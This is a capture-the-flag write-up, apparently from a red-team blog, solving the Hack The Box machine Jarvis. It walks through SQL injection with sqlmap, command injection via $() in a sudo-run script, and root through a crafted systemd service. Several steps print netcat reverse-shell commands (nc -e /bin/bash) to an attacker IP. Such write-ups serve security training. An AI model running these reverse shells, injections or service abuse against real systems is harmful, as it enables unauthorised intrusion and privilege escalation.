Jarvis Writeup – SMT Group

hello fellow hackers, today I’m going to solve Jarvis from hack the box

so lets get started!!!

I started with nmap to discover the open ports on the machine

nmap   -A  -sT  -v  10.10.10.143

so the box has two ports open in it

1- ssh running on port 22

2- Apache web server running on 80

let’s checkout port 80 !!!

Its a hotel web site “stark hotel” , after goofing around in the website I found /room.php page to rent rooms and its getting rooms from the database so I decided to test it for sql injection using sqlmap

sqlmap -u https://10.10.10.143/room.php?cod=5 --level=5 --risk=3

and yes!!!, cod parameter is vulnerable to sql injection, so I tried to pop out a shell using sqlmap option –os-shell

and boom!!! we are in as www-data user , so to get much more stable shell I got a reverse shell from sqlmap using nc

after getting the shell I tried to read the user flag but I have no privilege, so I need to escalate my privilege

after some enumeration I found that user www-data can use command sudo to execute simpler.py as pepper user

after running the script , it has an option to execute ping command so I tried to inject commands in it but all characters that can be used to inject commands are forbidding , after some google search i found an article talking about encapsulating the commands using $() so I tried it and it worked !!!

now we need to get a shell as pepper using this technique, so I wrote a nc command and save it into a bash file

#bin/bash
nc -nv 10.10.14.104 1995 -e /bin/bash

then I sat up my listener to listen on port 1995 after that I called the file inside the script and i have a shell as pepper and I can read the user flag!!!

$(bash shell.sh)

now for the root part , after some enumeration I really had nothing but I noticed something weird , i can run systemctl that is controlling interface and inspection tool for services ,when i ran systemctl it only warning me that i have no permission , it seems to work fine for me

so after some google search I found a way to exploit it

first we have to create a service and configure it to run our script that has the code for a reverse shell then we need to create the file that we want to execute

lets call our service X

nano  x.service

[Unit]
 Description=X
 [Service]
 ExecStart=/bin/bash /home/pepper/shell.sh
 [Install]
 WantedBy=multi-user.target

nano shell.sh

#bin/bash
nc -nv 10.10.14.104 1997 -e /bin/bash

now lets set our listener and run the service

systemctl enable /home/pepper/x.service --now

and let there be root!!!

SMT Red Team